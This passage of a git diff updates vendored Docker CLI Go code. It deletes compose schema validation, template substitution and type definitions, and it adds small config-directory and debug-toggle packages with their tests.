-            "oneOf": [
-              {"type": "string"},
-              {
-                "type": "object",
-                "properties": {
-                  "source": {"type": "string"},
-                  "target": {"type": "string"},
-                  "uid": {"type": "string"},
-                  "gid": {"type": "string"},
-                  "mode": {"type": "number"}
-                }
-              }
-            ]
-          }
-        },
-        "sysctls": {"$ref": "#/definitions/list_or_dict"},
-        "stdin_open": {"type": "boolean"},
-        "stop_grace_period": {"type": "string", "format": "duration"},
-        "stop_signal": {"type": "string"},
-        "tmpfs": {"$ref": "#/definitions/string_or_list"},
-        "tty": {"type": "boolean"},
-        "ulimits": {
-          "type": "object",
-          "patternProperties": {
-            "^[a-z]+$": {
-              "oneOf": [
-                {"type": "integer"},
-                {
-                  "type":"object",
-                  "properties": {
-                    "hard": {"type": "integer"},
-                    "soft": {"type": "integer"}
-                  },
-                  "required": ["soft", "hard"],
-                  "additionalProperties": false
-                }
-              ]
-            }
-          }
-        },
-        "user": {"type": "string"},
-        "userns_mode": {"type": "string"},
-        "volumes": {"type": "array", "items": {"type": "string"}, "uniqueItems": true},
-        "working_dir": {"type": "string"}
-      },
-      "additionalProperties": false
-    },
-
-    "healthcheck": {
-      "id": "#/definitions/healthcheck",
-      "type": "object",
-      "additionalProperties": false,
-      "properties": {
-        "disable": {"type": "boolean"},
-        "interval": {"type": "string"},
-        "retries": {"type": "number"},
-        "test": {
-          "oneOf": [
-            {"type": "string"},
-            {"type": "array", "items": {"type": "string"}}
-          ]
-        },
-        "timeout": {"type": "string"}
-      }
-    },
-    "deployment": {
-      "id": "#/definitions/deployment",
-      "type": ["object", "null"],
-      "properties": {
-        "mode": {"type": "string"},
-        "replicas": {"type": "integer"},
-        "labels": {"$ref": "#/definitions/list_or_dict"},
-        "update_config": {
-          "type": "object",
-          "properties": {
-            "parallelism": {"type": "integer"},
-            "delay": {"type": "string", "format": "duration"},
-            "failure_action": {"type": "string"},
-            "monitor": {"type": "string", "format": "duration"},
-            "max_failure_ratio": {"type": "number"}
-          },
-          "additionalProperties": false
-        },
-        "resources": {
-          "type": "object",
-          "properties": {
-            "limits": {"$ref": "#/definitions/resource"},
-            "reservations": {"$ref": "#/definitions/resource"}
-          }
-        },
-        "restart_policy": {
-          "type": "object",
-          "properties": {
-            "condition": {"type": "string"},
-            "delay": {"type": "string", "format": "duration"},
-            "max_attempts": {"type": "integer"},
-            "window": {"type": "string", "format": "duration"}
-          },
-          "additionalProperties": false
-        },
-        "placement": {
-          "type": "object",
-          "properties": {
-            "constraints": {"type": "array", "items": {"type": "string"}}
-          },
-          "additionalProperties": false
-        }
-      },
-      "additionalProperties": false
-    },
-
-    "resource": {
-      "id": "#/definitions/resource",
-      "type": "object",
-      "properties": {
-        "cpus": {"type": "string"},
-        "memory": {"type": "string"}
-      },
-      "additionalProperties": false
-    },
-
-    "network": {
-      "id": "#/definitions/network",
-      "type": ["object", "null"],
-      "properties": {
-        "driver": {"type": "string"},
-        "driver_opts": {
-          "type": "object",
-          "patternProperties": {
-            "^.+$": {"type": ["string", "number"]}
-          }
-        },
-        "ipam": {
-          "type": "object",
-          "properties": {
-            "driver": {"type": "string"},
-            "config": {
-              "type": "array",
-              "items": {
-                "type": "object",
-                "properties": {
-                  "subnet": {"type": "string"}
-                },
-                "additionalProperties": false
-              }
-            }
-          },
-          "additionalProperties": false
-        },
-        "external": {
-          "type": ["boolean", "object"],
-          "properties": {
-            "name": {"type": "string"}
-          },
-          "additionalProperties": false
-        },
-        "internal": {"type": "boolean"},
-        "labels": {"$ref": "#/definitions/list_or_dict"}
-      },
-      "additionalProperties": false
-    },
-
-    "volume": {
-      "id": "#/definitions/volume",
-      "type": ["object", "null"],
-      "properties": {
-        "driver": {"type": "string"},
-        "driver_opts": {
-          "type": "object",
-          "patternProperties": {
-            "^.+$": {"type": ["string", "number"]}
-          }
-        },
-        "external": {
-          "type": ["boolean", "object"],
-          "properties": {
-            "name": {"type": "string"}
-          },
-          "additionalProperties": false
-        },
-        "labels": {"$ref": "#/definitions/list_or_dict"}
-      },
-      "additionalProperties": false
-    },
-
-    "secret": {
-      "id": "#/definitions/secret",
-      "type": "object",
-      "properties": {
-        "file": {"type": "string"},
-        "external": {
-          "type": ["boolean", "object"],
-          "properties": {
-            "name": {"type": "string"}
-          }
-        },
-        "labels": {"$ref": "#/definitions/list_or_dict"}
-      },
-      "additionalProperties": false
-    },
-
-    "string_or_list": {
-      "oneOf": [
-        {"type": "string"},
-        {"$ref": "#/definitions/list_of_strings"}
-      ]
-    },
-
-    "list_of_strings": {
-      "type": "array",
-      "items": {"type": "string"},
-      "uniqueItems": true
-    },
-
-    "list_or_dict": {
-      "oneOf": [
-        {
-          "type": "object",
-          "patternProperties": {
-            ".+": {
-              "type": ["string", "number", "null"]
-            }
-          },
-          "additionalProperties": false
-        },
-        {"type": "array", "items": {"type": "string"}, "uniqueItems": true}
-      ]
-    },
-
-    "constraints": {
-      "service": {
-        "id": "#/definitions/constraints/service",
-        "anyOf": [
-          {"required": ["build"]},
-          {"required": ["image"]}
-        ],
-        "properties": {
-          "build": {
-            "required": ["context"]
-          }
-        }
-      }
-    }
-  }
-}
diff --git a/vendor/github.com/docker/docker/cli/compose/schema/schema.go b/vendor/github.com/docker/docker/cli/compose/schema/schema.go
deleted file mode 100644
index ae33c77fbe..0000000000
--- a/vendor/github.com/docker/docker/cli/compose/schema/schema.go
+++ /dev/null
@@ -1,137 +0,0 @@
-package schema
-
-//go:generate go-bindata -pkg schema -nometadata data
-
-import (
-	"fmt"
-	"strings"
-	"time"
-
-	"github.com/pkg/errors"
-	"github.com/xeipuuv/gojsonschema"
-)
-
-const (
-	defaultVersion = "1.0"
-	versionField   = "version"
-)
-
-type portsFormatChecker struct{}
-
-func (checker portsFormatChecker) IsFormat(input string) bool {
-	// TODO: implement this
-	return true
-}
-
-type durationFormatChecker struct{}
-
-func (checker durationFormatChecker) IsFormat(input string) bool {
-	_, err := time.ParseDuration(input)
-	return err == nil
-}
-
-func init() {
-	gojsonschema.FormatCheckers.Add("expose", portsFormatChecker{})
-	gojsonschema.FormatCheckers.Add("ports", portsFormatChecker{})
-	gojsonschema.FormatCheckers.Add("duration", durationFormatChecker{})
-}
-
-// Version returns the version of the config, defaulting to version 1.0
-func Version(config map[string]interface{}) string {
-	version, ok := config[versionField]
-	if !ok {
-		return defaultVersion
-	}
-	return normalizeVersion(fmt.Sprintf("%v", version))
-}
-
-func normalizeVersion(version string) string {
-	switch version {
-	case "3":
-		return "3.0"
-	default:
-		return version
-	}
-}
-
-// Validate uses the jsonschema to validate the configuration
-func Validate(config map[string]interface{}, version string) error {
-	schemaData, err := Asset(fmt.Sprintf("data/config_schema_v%s.json", version))
-	if err != nil {
-		return errors.Errorf("unsupported Compose file version: %s", version)
-	}
-
-	schemaLoader := gojsonschema.NewStringLoader(string(schemaData))
-	dataLoader := gojsonschema.NewGoLoader(config)
-
-	result, err := gojsonschema.Validate(schemaLoader, dataLoader)
-	if err != nil {
-		return err
-	}
-
-	if !result.Valid() {
-		return toError(result)
-	}
-
-	return nil
-}
-
-func toError(result *gojsonschema.Result) error {
-	err := getMostSpecificError(result.Errors())
-	description := getDescription(err)
-	return fmt.Errorf("%s %s", err.Field(), description)
-}
-
-func getDescription(err gojsonschema.ResultError) string {
-	if err.Type() == "invalid_type" {
-		if expectedType, ok := err.Details()["expected"].(string); ok {
-			return fmt.Sprintf("must be a %s", humanReadableType(expectedType))
-		}
-	}
-
-	return err.Description()
-}
-
-func humanReadableType(definition string) string {
-	if definition[0:1] == "[" {
-		allTypes := strings.Split(definition[1:len(definition)-1], ",")
-		for i, t := range allTypes {
-			allTypes[i] = humanReadableType(t)
-		}
-		return fmt.Sprintf(
-			"%s or %s",
-			strings.Join(allTypes[0:len(allTypes)-1], ", "),
-			allTypes[len(allTypes)-1],
-		)
-	}
-	if definition == "object" {
-		return "mapping"
-	}
-	if definition == "array" {
-		return "list"
-	}
-	return definition
-}
-
-func getMostSpecificError(errors []gojsonschema.ResultError) gojsonschema.ResultError {
-	var mostSpecificError gojsonschema.ResultError
-
-	for _, err := range errors {
-		if mostSpecificError == nil {
-			mostSpecificError = err
-		} else if specificity(err) > specificity(mostSpecificError) {
-			mostSpecificError = err
-		} else if specificity(err) == specificity(mostSpecificError) {
-			// Invalid type errors win in a tie-breaker for most specific field name
-			if err.Type() == "invalid_type" && mostSpecificError.Type() != "invalid_type" {
-				mostSpecificError = err
-			}
-		}
-	}
-
-	return mostSpecificError
-}
-
-func specificity(err gojsonschema.ResultError) int {
-	return len(strings.Split(err.Field(), "."))
-}
diff --git a/vendor/github.com/docker/docker/cli/compose/schema/schema_test.go b/vendor/github.com/docker/docker/cli/compose/schema/schema_test.go
deleted file mode 100644
index 0935d4022e..0000000000
--- a/vendor/github.com/docker/docker/cli/compose/schema/schema_test.go
+++ /dev/null
@@ -1,52 +0,0 @@
-package schema
-
-import (
-	"testing"
-
-	"github.com/stretchr/testify/assert"
-)
-
-type dict map[string]interface{}
-
-func TestValidate(t *testing.T) {
-	config := dict{
-		"version": "3.0",
-		"services": dict{
-			"foo": dict{
-				"image": "busybox",
-			},
-		},
-	}
-
-	assert.NoError(t, Validate(config, "3.0"))
-}
-
-func TestValidateUndefinedTopLevelOption(t *testing.T) {
-	config := dict{
-		"version": "3.0",
-		"helicopters": dict{
-			"foo": dict{
-				"image": "busybox",
-			},
-		},
-	}
-
-	err := Validate(config, "3.0")
-	assert.Error(t, err)
-	assert.Contains(t, err.Error(), "Additional property helicopters is not allowed")
-}
-
-func TestValidateInvalidVersion(t *testing.T) {
-	config := dict{
-		"version": "2.1",
-		"services": dict{
-			"foo": dict{
-				"image": "busybox",
-			},
-		},
-	}
-
-	err := Validate(config, "2.1")
-	assert.Error(t, err)
-	assert.Contains(t, err.Error(), "unsupported Compose file version: 2.1")
-}
diff --git a/vendor/github.com/docker/docker/cli/compose/template/template.go b/vendor/github.com/docker/docker/cli/compose/template/template.go
deleted file mode 100644
index 28495baf50..0000000000
--- a/vendor/github.com/docker/docker/cli/compose/template/template.go
+++ /dev/null
@@ -1,100 +0,0 @@
-package template
-
-import (
-	"fmt"
-	"regexp"
-	"strings"
-)
-
-var delimiter = "\\$"
-var substitution = "[_a-z][_a-z0-9]*(?::?-[^}]+)?"
-
-var patternString = fmt.Sprintf(
-	"%s(?i:(?P<escaped>%s)|(?P<named>%s)|{(?P<braced>%s)}|(?P<invalid>))",
-	delimiter, delimiter, substitution, substitution,
-)
-
-var pattern = regexp.MustCompile(patternString)
-
-// InvalidTemplateError is returned when a variable template is not in a valid
-// format
-type InvalidTemplateError struct {
-	Template string
-}
-
-func (e InvalidTemplateError) Error() string {
-	return fmt.Sprintf("Invalid template: %#v", e.Template)
-}
-
-// Mapping is a user-supplied function which maps from variable names to values.
-// Returns the value as a string and a bool indicating whether
-// the value is present, to distinguish between an empty string
-// and the absence of a value.
-type Mapping func(string) (string, bool)
-
-// Substitute variables in the string with their values
-func Substitute(template string, mapping Mapping) (result string, err *InvalidTemplateError) {
-	result = pattern.ReplaceAllStringFunc(template, func(substring string) string {
-		matches := pattern.FindStringSubmatch(substring)
-		groups := make(map[string]string)
-		for i, name := range pattern.SubexpNames() {
-			if i != 0 {
-				groups[name] = matches[i]
-			}
-		}
-
-		substitution := groups["named"]
-		if substitution == "" {
-			substitution = groups["braced"]
-		}
-		if substitution != "" {
-			// Soft default (fall back if unset or empty)
-			if strings.Contains(substitution, ":-") {
-				name, defaultValue := partition(substitution, ":-")
-				value, ok := mapping(name)
-				if !ok || value == "" {
-					return defaultValue
-				}
-				return value
-			}
-
-			// Hard default (fall back if-and-only-if empty)
-			if strings.Contains(substitution, "-") {
-				name, defaultValue := partition(substitution, "-")
-				value, ok := mapping(name)
-				if !ok {
-					return defaultValue
-				}
-				return value
-			}
-
-			// No default (fall back to empty string)
-			value, ok := mapping(substitution)
-			if !ok {
-				return ""
-			}
-			return value
-		}
-
-		if escaped := groups["escaped"]; escaped != "" {
-			return escaped
-		}
-
-		err = &InvalidTemplateError{Template: template}
-		return ""
-	})
-
-	return result, err
-}
-
-// Split the string at the first occurrence of sep, and return the part before the separator,
-// and the part after the separator.
-//
-// If the separator is not found, return the string itself, followed by an empty string.
-func partition(s, sep string) (string, string) {
-	if strings.Contains(s, sep) {
-		parts := strings.SplitN(s, sep, 2)
-		return parts[0], parts[1]
-	}
-	return s, ""
-}
diff --git a/vendor/github.com/docker/docker/cli/compose/template/template_test.go b/vendor/github.com/docker/docker/cli/compose/template/template_test.go
deleted file mode 100644
index 6b81bf0a39..0000000000
--- a/vendor/github.com/docker/docker/cli/compose/template/template_test.go
+++ /dev/null
@@ -1,83 +0,0 @@
-package template
-
-import (
-	"testing"
-
-	"github.com/stretchr/testify/assert"
-)
-
-var defaults = map[string]string{
-	"FOO": "first",
-	"BAR": "",
-}
-
-func defaultMapping(name string) (string, bool) {
-	val, ok := defaults[name]
-	return val, ok
-}
-
-func TestEscaped(t *testing.T) {
-	result, err := Substitute("$${foo}", defaultMapping)
-	assert.NoError(t, err)
-	assert.Equal(t, "${foo}", result)
-}
-
-func TestInvalid(t *testing.T) {
-	invalidTemplates := []string{
-		"${",
-		"$}",
-		"${}",
-		"${ }",
-		"${ foo}",
-		"${foo }",
-		"${foo!}",
-	}
-
-	for _, template := range invalidTemplates {
-		_, err := Substitute(template, defaultMapping)
-		assert.Error(t, err)
-		assert.IsType(t, &InvalidTemplateError{}, err)
-	}
-}
-
-func TestNoValueNoDefault(t *testing.T) {
-	for _, template := range []string{"This ${missing} var", "This ${BAR} var"} {
-		result, err := Substitute(template, defaultMapping)
-		assert.NoError(t, err)
-		assert.Equal(t, "This  var", result)
-	}
-}
-
-func TestValueNoDefault(t *testing.T) {
-	for _, template := range []string{"This $FOO var", "This ${FOO} var"} {
-		result, err := Substitute(template, defaultMapping)
-		assert.NoError(t, err)
-		assert.Equal(t, "This first var", result)
-	}
-}
-
-func TestNoValueWithDefault(t *testing.T) {
-	for _, template := range []string{"ok ${missing:-def}", "ok ${missing-def}"} {
-		result, err := Substitute(template, defaultMapping)
-		assert.NoError(t, err)
-		assert.Equal(t, "ok def", result)
-	}
-}
-
-func TestEmptyValueWithSoftDefault(t *testing.T) {
-	result, err := Substitute("ok ${BAR:-def}", defaultMapping)
-	assert.NoError(t, err)
-	assert.Equal(t, "ok def", result)
-}
-
-func TestEmptyValueWithHardDefault(t *testing.T) {
-	result, err := Substitute("ok ${BAR-def}", defaultMapping)
-	assert.NoError(t, err)
-	assert.Equal(t, "ok ", result)
-}
-
-func TestNonAlphanumericDefault(t *testing.T) {
-	result, err := Substitute("ok ${BAR:-/non:-alphanumeric}", defaultMapping)
-	assert.NoError(t, err)
-	assert.Equal(t, "ok /non:-alphanumeric", result)
-}
diff --git a/vendor/github.com/docker/docker/cli/compose/types/types.go b/vendor/github.com/docker/docker/cli/compose/types/types.go
deleted file mode 100644
index cae7b4af26..0000000000
--- a/vendor/github.com/docker/docker/cli/compose/types/types.go
+++ /dev/null
@@ -1,253 +0,0 @@
-package types
-
-import (
-	"time"
-)
-
-// UnsupportedProperties not yet supported by this implementation of the compose file
-var UnsupportedProperties = []string{
-	"build",
-	"cap_add",
-	"cap_drop",
-	"cgroup_parent",
-	"devices",
-	"dns",
-	"dns_search",
-	"domainname",
-	"external_links",
-	"ipc",
-	"links",
-	"mac_address",
-	"network_mode",
-	"privileged",
-	"read_only",
-	"restart",
-	"security_opt",
-	"shm_size",
-	"stop_signal",
-	"sysctls",
-	"tmpfs",
-	"userns_mode",
-}
-
-// DeprecatedProperties that were removed from the v3 format, but their
-// use should not impact the behaviour of the application.
-var DeprecatedProperties = map[string]string{
-	"container_name": "Setting the container name is not supported.",
-	"expose":         "Exposing ports is unnecessary - services on the same network can access each other's containers on any port.",
-}
-
-// ForbiddenProperties that are not supported in this implementation of the
-// compose file.
-var ForbiddenProperties = map[string]string{
-	"extends":       "Support for `extends` is not implemented yet. Use `docker-compose config` to generate a configuration with all `extends` options resolved, and deploy from that.",
-	"volume_driver": "Instead of setting the volume driver on the service, define a volume using the top-level `volumes` option and specify the driver there.",
-	"volumes_from":  "To share a volume between services, define it using the top-level `volumes` option and reference it from each service that shares it using the service-level `volumes` option.",
-	"cpu_quota":     "Set resource limits using deploy.resources",
-	"cpu_shares":    "Set resource limits using deploy.resources",
-	"cpuset":        "Set resource limits using deploy.resources",
-	"mem_limit":     "Set resource limits using deploy.resources",
-	"memswap_limit": "Set resource limits using deploy.resources",
-}
-
-// Dict is a mapping of strings to interface{}
-type Dict map[string]interface{}
-
-// ConfigFile is a filename and the contents of the file as a Dict
-type ConfigFile struct {
-	Filename string
-	Config   Dict
-}
-
-// ConfigDetails are the details about a group of ConfigFiles
-type ConfigDetails struct {
-	WorkingDir  string
-	ConfigFiles []ConfigFile
-	Environment map[string]string
-}
-
-// Config is a full compose file configuration
-type Config struct {
-	Services []ServiceConfig
-	Networks map[string]NetworkConfig
-	Volumes  map[string]VolumeConfig
-	Secrets  map[string]SecretConfig
-}
-
-// ServiceConfig is the configuration of one service
-type ServiceConfig struct {
-	Name string
-
-	CapAdd          []string `mapstructure:"cap_add"`
-	CapDrop         []string `mapstructure:"cap_drop"`
-	CgroupParent    string   `mapstructure:"cgroup_parent"`
-	Command         []string `compose:"shell_command"`
-	ContainerName   string   `mapstructure:"container_name"`
-	DependsOn       []string `mapstructure:"depends_on"`
-	Deploy          DeployConfig
-	Devices         []string
-	DNS             []string          `compose:"string_or_list"`
-	DNSSearch       []string          `mapstructure:"dns_search" compose:"string_or_list"`
-	DomainName      string            `mapstructure:"domainname"`
-	Entrypoint      []string          `compose:"shell_command"`
-	Environment     map[string]string `compose:"list_or_dict_equals"`
-	Expose          []string          `compose:"list_of_strings_or_numbers"`
-	ExternalLinks   []string          `mapstructure:"external_links"`
-	ExtraHosts      map[string]string `mapstructure:"extra_hosts" compose:"list_or_dict_colon"`
-	Hostname        string
-	HealthCheck     *HealthCheckConfig
-	Image           string
-	Ipc             string
-	Labels          map[string]string `compose:"list_or_dict_equals"`
-	Links           []string
-	Logging         *LoggingConfig
-	MacAddress      string                           `mapstructure:"mac_address"`
-	NetworkMode     string                           `mapstructure:"network_mode"`
-	Networks        map[string]*ServiceNetworkConfig `compose:"list_or_struct_map"`
-	Pid             string
-	Ports           []string `compose:"list_of_strings_or_numbers"`
-	Privileged      bool
-	ReadOnly        bool `mapstructure:"read_only"`
-	Restart         string
-	Secrets         []ServiceSecretConfig
-	SecurityOpt     []string       `mapstructure:"security_opt"`
-	StdinOpen       bool           `mapstructure:"stdin_open"`
-	StopGracePeriod *time.Duration `mapstructure:"stop_grace_period"`
-	StopSignal      string         `mapstructure:"stop_signal"`
-	Tmpfs           []string       `compose:"string_or_list"`
-	Tty             bool           `mapstructure:"tty"`
-	Ulimits         map[string]*UlimitsConfig
-	User            string
-	Volumes         []string
-	WorkingDir      string `mapstructure:"working_dir"`
-}
-
-// LoggingConfig the logging configuration for a service
-type LoggingConfig struct {
-	Driver  string
-	Options map[string]string
-}
-
-// DeployConfig the deployment configuration for a service
-type DeployConfig struct {
-	Mode          string
-	Replicas      *uint64
-	Labels        map[string]string `compose:"list_or_dict_equals"`
-	UpdateConfig  *UpdateConfig     `mapstructure:"update_config"`
-	Resources     Resources
-	RestartPolicy *RestartPolicy `mapstructure:"restart_policy"`
-	Placement     Placement
-}
-
-// HealthCheckConfig the healthcheck configuration for a service
-type HealthCheckConfig struct {
-	Test     []string `compose:"healthcheck"`
-	Timeout  string
-	Interval string
-	Retries  *uint64
-	Disable  bool
-}
-
-// UpdateConfig the service update configuration
-type UpdateConfig struct {
-	Parallelism     *uint64
-	Delay           time.Duration
-	FailureAction   string `mapstructure:"failure_action"`
-	Monitor         time.Duration
-	MaxFailureRatio float32 `mapstructure:"max_failure_ratio"`
-}
-
-// Resources the resource limits and reservations
-type Resources struct {
-	Limits       *Resource
-	Reservations *Resource
-}
-
-// Resource is a resource to be limited or reserved
-type Resource struct {
-	// TODO: types to convert from units and ratios
-	NanoCPUs    string    `mapstructure:"cpus"`
-	MemoryBytes UnitBytes `mapstructure:"memory"`
-}
-
-// UnitBytes is the bytes type
-type UnitBytes int64
-
-// RestartPolicy the service restart policy
-type RestartPolicy struct {
-	Condition   string
-	Delay       *time.Duration
-	MaxAttempts *uint64 `mapstructure:"max_attempts"`
-	Window      *time.Duration
-}
-
-// Placement constraints for the service
-type Placement struct {
-	Constraints []string
-}
-
-// ServiceNetworkConfig is the network configuration for a service
-type ServiceNetworkConfig struct {
-	Aliases     []string
-	Ipv4Address string `mapstructure:"ipv4_address"`
-	Ipv6Address string `mapstructure:"ipv6_address"`
-}
-
-// ServiceSecretConfig is the secret configuration for a service
-type ServiceSecretConfig struct {
-	Source string
-	Target string
-	UID    string
-	GID    string
-	Mode   uint32
-}
-
-// UlimitsConfig the ulimit configuration
-type UlimitsConfig struct {
-	Single int
-	Soft   int
-	Hard   int
-}
-
-// NetworkConfig for a network
-type NetworkConfig struct {
-	Driver     string
-	DriverOpts map[string]string `mapstructure:"driver_opts"`
-	Ipam       IPAMConfig
-	External   External
-	Internal   bool
-	Labels     map[string]string `compose:"list_or_dict_equals"`
-}
-
-// IPAMConfig for a network
-type IPAMConfig struct {
-	Driver string
-	Config []*IPAMPool
-}
-
-// IPAMPool for a network
-type IPAMPool struct {
-	Subnet string
-}
-
-// VolumeConfig for a volume
-type VolumeConfig struct {
-	Driver     string
-	DriverOpts map[string]string `mapstructure:"driver_opts"`
-	External   External
-	Labels     map[string]string `compose:"list_or_dict_equals"`
-}
-
-// External identifies a Volume or Network as a reference to a resource that is
-// not managed, and should already exist.
-type External struct {
-	Name     string
-	External bool
-}
-
-// SecretConfig for a secret
-type SecretConfig struct {
-	File     string
-	External External
-	Labels   map[string]string `compose:"list_or_dict_equals"`
-}
diff --git a/vendor/github.com/docker/docker/cli/config/configdir.go b/vendor/github.com/docker/docker/cli/config/configdir.go
new file mode 100644
index 0000000000..4bef4e104d
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/config/configdir.go
@@ -0,0 +1,25 @@
+package config // import "github.com/docker/docker/cli/config"
+
+import (
+	"os"
+	"path/filepath"
+
+	"github.com/docker/docker/pkg/homedir"
+)
+
+var (
+	configDir     = os.Getenv("DOCKER_CONFIG")
+	configFileDir = ".docker"
+)
+
+// Dir returns the path to the configuration directory as specified by the DOCKER_CONFIG environment variable.
+// TODO: this was copied from cli/config/configfile and should be removed once cmd/dockerd moves
+func Dir() string {
+	return configDir
+}
+
+func init() {
+	if configDir == "" {
+		configDir = filepath.Join(homedir.Get(), configFileDir)
+	}
+}
diff --git a/vendor/github.com/docker/docker/cli/debug/debug.go b/vendor/github.com/docker/docker/cli/debug/debug.go
new file mode 100644
index 0000000000..2303e15c99
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/debug/debug.go
@@ -0,0 +1,26 @@
+package debug // import "github.com/docker/docker/cli/debug"
+
+import (
+	"os"
+
+	"github.com/sirupsen/logrus"
+)
+
+// Enable sets the DEBUG env var to true
+// and makes the logger to log at debug level.
+func Enable() {
+	os.Setenv("DEBUG", "1")
+	logrus.SetLevel(logrus.DebugLevel)
+}
+
+// Disable sets the DEBUG env var to false
+// and makes the logger to log at info level.
+func Disable() {
+	os.Setenv("DEBUG", "")
+	logrus.SetLevel(logrus.InfoLevel)
+}
+
+// IsEnabled checks whether the debug flag is set or not.
+func IsEnabled() bool {
+	return os.Getenv("DEBUG") != ""
+}
diff --git a/vendor/github.com/docker/docker/utils/debug_test.go b/vendor/github.com/docker/docker/cli/debug/debug_test.go
similarity index 71%
rename from vendor/github.com/docker/docker/utils/debug_test.go
rename to vendor/github.com/docker/docker/cli/debug/debug_test.go
index 6f9c4dfbb0..5b6d788a39 100644
--- a/vendor/github.com/docker/docker/utils/debug_test.go
+++ b/vendor/github.com/docker/docker/cli/debug/debug_test.go
@@ -1,18 +1,18 @@
-package utils
+package debug // import "github.com/docker/docker/cli/debug"
 
 import (
 	"os"
 	"testing"
 
-	"github.com/Sirupsen/logrus"
+	"github.com/sirupsen/logrus"
 )
 
-func TestEnableDebug(t *testing.T) {
+func TestEnable(t *testing.T) {
 	defer func() {
 		os.Setenv("DEBUG", "")
 		logrus.SetLevel(logrus.InfoLevel)
 	}()
-	EnableDebug()
+	Enable()
 	if os.Getenv("DEBUG") != "1" {
 		t.Fatalf("expected DEBUG=1, got %s\n", os.Getenv("DEBUG"))
 	}
@@ -21,8 +21,8 @@ func TestEnableDebug(t *testing.T) {
 	}
 }
 
-func TestDisableDebug(t *testing.T) {
-	DisableDebug()
+func TestDisable(t *testing.T) {
+	Disable()
 	if os.Getenv("DEBUG") != "" {
 		t.Fatalf("expected DEBUG=\"\", got %s\n", os.Getenv("DEBUG"))
 	}
@@ -31,13 +31,13 @@ func TestDisableDebug(t *testing.T) {
 	}
 }
 
-func TestDebugEnabled(t *testing.T) {
-	EnableDebug()
-	if !IsDebugEnabled() {
+func TestEnabled(t *testing.T) {
+	Enable()
+	if !IsEnabled() {
 		t.Fatal("expected debug enabled, got false")
 	}
-	DisableDebug()
-	if IsDebugEnabled() {
+	Disable()
+	if IsEnabled() {
 		t.Fatal("expected debug disabled, got true")
 	}
 }
diff --git a/vendor/github.com/docker/docker/cli/error.go b/vendor/github.com/docker/docker/cli/error.go
index 62f62433b8..ea7c0eb506 100644
--- a/vendor/github.com/docker/docker/cli/error.go
+++ b/vendor/github.com/docker/docker/cli/error.go
@@ -1,4 +1,4 @@
-package cli
+package cli // import "github.com/docker/docker/cli"
 
 import (
 	"fmt"
diff --git a/vendor/github.com/docker/docker/cli/flags/client.go b/vendor/github.com/docker/docker/cli/flags/client.go
deleted file mode 100644
index 9b6940f6bd..0000000000
--- a/vendor/github.com/docker/docker/cli/flags/client.go
+++ /dev/null
@@ -1,13 +0,0 @@
-package flags
-
-// ClientOptions are the options used to configure the client cli
-type ClientOptions struct {
-	Common    *CommonOptions
-	ConfigDir string
-	Version   bool
-}
-
-// NewClientOptions returns a new ClientOptions
-func NewClientOptions() *ClientOptions {
-	return &ClientOptions{Common: NewCommonOptions()}
-}
diff --git a/vendor/github.com/docker/docker/cli/flags/common_test.go b/vendor/github.com/docker/docker/cli/flags/common_test.go
deleted file mode 100644
index 81eaa38f43..0000000000
--- a/vendor/github.com/docker/docker/cli/flags/common_test.go
+++ /dev/null
@@ -1,42 +0,0 @@
-package flags
-
-import (
-	"path/filepath"
-	"testing"
-
-	"github.com/docker/docker/cliconfig"
-	"github.com/docker/docker/pkg/testutil/assert"
-	"github.com/spf13/pflag"
-)
-
-func TestCommonOptionsInstallFlags(t *testing.T) {
-	flags := pflag.NewFlagSet("testing", pflag.ContinueOnError)
-	opts := NewCommonOptions()
-	opts.InstallFlags(flags)
-
-	err := flags.Parse([]string{
-		"--tlscacert=\"/foo/cafile\"",
-		"--tlscert=\"/foo/cert\"",
-		"--tlskey=\"/foo/key\"",
-	})
-	assert.NilError(t, err)
-	assert.Equal(t, opts.TLSOptions.CAFile, "/foo/cafile")
-	assert.Equal(t, opts.TLSOptions.CertFile, "/foo/cert")
-	assert.Equal(t, opts.TLSOptions.KeyFile, "/foo/key")
-}
-
-func defaultPath(filename string) string {
-	return filepath.Join(cliconfig.ConfigDir(), filename)
-}
-
-func TestCommonOptionsInstallFlagsWithDefaults(t *testing.T) {
-	flags := pflag.NewFlagSet("testing", pflag.ContinueOnError)
-	opts := NewCommonOptions()
-	opts.InstallFlags(flags)
-
-	err := flags.Parse([]string{})
-	assert.NilError(t, err)
-	assert.Equal(t, opts.TLSOptions.CAFile, defaultPath("ca.pem"))
-	assert.Equal(t, opts.TLSOptions.CertFile, defaultPath("cert.pem"))
-	assert.Equal(t, opts.TLSOptions.KeyFile, defaultPath("key.pem"))
-}
diff --git a/vendor/github.com/docker/docker/cli/required.go b/vendor/github.com/docker/docker/cli/required.go
index 8ee02c8429..e1ff02d2e9 100644
--- a/vendor/github.com/docker/docker/cli/required.go
+++ b/vendor/github.com/docker/docker/cli/required.go
@@ -1,9 +1,9 @@
-package cli
+package cli // import "github.com/docker/docker/cli"
 
 import (
-	"fmt"
 	"strings"
 
+	"github.com/pkg/errors"
 	"github.com/spf13/cobra"
 )
 
@@ -14,10 +14,10 @@ func NoArgs(cmd *cobra.Command, args []string) error {
 	}
 
 	if cmd.HasSubCommands() {
-		return fmt.Errorf("\n" + strings.TrimRight(cmd.UsageString(), "\n"))
+		return errors.Errorf("\n" + strings.TrimRight(cmd.UsageString(), "\n"))
 	}
 
-	return fmt.Errorf(
+	return errors.Errorf(
 		"\"%s\" accepts no argument(s).\nSee '%s --help'.\n\nUsage:  %s\n\n%s",
 		cmd.CommandPath(),
 		cmd.CommandPath(),
@@ -25,72 +25,3 @@ func NoArgs(cmd *cobra.Command, args []string) error {
 		cmd.Short,
 	)
 }
-
-// RequiresMinArgs returns an error if there is not at least min args
-func RequiresMinArgs(min int) cobra.PositionalArgs {
-	return func(cmd *cobra.Command, args []string) error {
-		if len(args) >= min {
-			return nil
-		}
-		return fmt.Errorf(
-			"\"%s\" requires at least %d argument(s).\nSee '%s --help'.\n\nUsage:  %s\n\n%s",
-			cmd.CommandPath(),
-			min,
-			cmd.CommandPath(),
-			cmd.UseLine(),
-			cmd.Short,
-		)
-	}
-}
-
-// RequiresMaxArgs returns an error if there is not at most max args
-func RequiresMaxArgs(max int) cobra.PositionalArgs {
-	return func(cmd *cobra.Command, args []string) error {
-		if len(args) <= max {
-			return nil
-		}
-		return fmt.Errorf(
-			"\"%s\" requires at most %d argument(s).\nSee '%s --help'.\n\nUsage:  %s\n\n%s",
-			cmd.CommandPath(),
-			max,
-			cmd.CommandPath(),
-			cmd.UseLine(),
